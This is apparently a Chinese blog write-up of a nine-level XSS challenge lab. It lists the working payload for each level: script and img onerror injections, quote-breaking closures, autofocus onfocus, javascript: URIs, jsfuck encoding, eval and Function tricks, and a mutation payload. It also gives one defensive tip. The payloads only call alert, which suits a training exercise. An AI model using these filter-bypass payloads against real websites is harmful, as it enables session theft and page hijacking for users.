XSS靶场漏洞复现

目录

第一关 Ma Spaghet!

第二关 Jefff

第三关 Ugandan Knuckles

第四关 Ricardo Milos

第五关 Ah That's Hawt

第六关 Ligma

第七关 Mafia

第八关 Ok, Boomer

第九关 WW3


第一关 Ma Spaghet!

1.尝试使用弹窗的方式:?somebody=<script>alert(1)</script>

2.使用img标签就可以弹出:?somebody=<img src=1 οnerrοr="alert(1337)">

3.防御方法:将innerHTML换成innerText函数,因为innerText不会将字符串解析为<p>标签

第二关 Jefff

1.传值后显示:?jeff=aaaaaaa

2.使用双引号闭合:?jeff=aaa";alert(1337);"

3.使用-连接符同样也可以弹出:?jeff=aaa"-alert(1337);-"

第三关 Ugandan Knuckles

1.尝试用户交互方式,但需要用户点击文本框才会弹出,所以失败:?weyaaaa"%20οnclick="alert(1)

2.使用onfocus焦点自动触发:?wey=aaaa" οnfοcus=alert(1337) autofocus="

第四关 Ricardo Milos

1.两秒后自动触发:?ricardo=javascript:alert(1337)

第五关 Ah That's Hawt

1.使用javascript和编码来实现:?markassbrownlee=<img src=1 οnerrοr=location="javascript:alert%25281%2529">

第六关 Ligma

1.过滤了字母数字,所以要使用编码的方式

replace(/[A-Za-z0-9]/g, '')

2.登录jsfuck进行转码

3.然后进行urlcode转码

第七关 Mafia

1.用函数方式转为小写:?mafia=Function(/ALERT(1337)/.source.toLowerCase())()

2.用eval转换中间编码为alert:?mafia=eval(8680439..toString(30))(1337)

3.用hash的方式截取:?mafia=eval(location.hash.slice(1))#alert(1337)

第八关 Ok, Boomer

1.使用tel方法:?boomer=<a%20id=ok%20href="tel:alert(1337)">

第九关 WW3

1.加载路径:?text=aaa&img=https://i.imgur.com/PdbDexI.jpg

2.未触发?text=<img%20src=1%20οnerrοr=alert(1)>&img=https://i.imgur.com/PdbDexI.jpg

3.传图片:?text=img=<img name%3dnotify><style><style%2F><script>alert(1337)%2F%2F&img=https://i.imgur.com/PdbDexI.jpg

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值